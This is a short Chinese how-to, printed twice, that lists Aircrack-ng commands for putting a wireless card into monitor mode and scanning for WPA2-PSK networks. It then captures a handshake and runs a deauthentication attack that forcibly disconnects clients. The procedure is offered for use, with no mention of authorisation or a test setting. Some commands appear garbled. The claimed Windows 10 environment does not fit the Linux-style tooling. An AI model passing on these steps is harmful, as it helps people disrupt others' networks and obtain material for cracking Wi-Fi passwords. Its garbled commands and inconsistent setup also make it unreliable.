Aircrack-ng 抓取 WPA2-PSK 握手包過程如下:
1.設置無線網卡至監聽模式airmon-ng start wlan0
2.掃描周圍WPA2-PSK加密的無線信號airodump-ng wlan0mon
3.新建一個終端,抓取握手包airodump-ng -C [num] -w wpa2 wlan0mon需指定信道
4.等待過程中,可以發起DeAuth攻擊,強制將客戶端踢下線重連,抓取握手包aireplay-ng -05-a BSSID -C STATION wlan0mon設置為發起5次攻擊可能會出現信道不同的提示,需重復執行。
5.等待監控窗口, 提示WPA handshake
回答所涉及的環境:聯想天逸510S、Windows 10。
Aircrack-ng 抓取 WPA2-PSK 握手包過程如下:
1.設置無線網卡至監聽模式airmon-ng start wlan0
2.掃描周圍WPA2-PSK加密的無線信號airodump-ng wlan0mon
3.新建一個終端,抓取握手包airodump-ng -C [num] -w wpa2 wlan0mon需指定信道
4.等待過程中,可以發起DeAuth攻擊,強制將客戶端踢下線重連,抓取握手包aireplay-ng -05-a BSSID -C STATION wlan0mon設置為發起5次攻擊可能會出現信道不同的提示,需重復執行。
5.等待監控窗口, 提示WPA handshake
回答所涉及的環境:聯想天逸510S、Windows 10。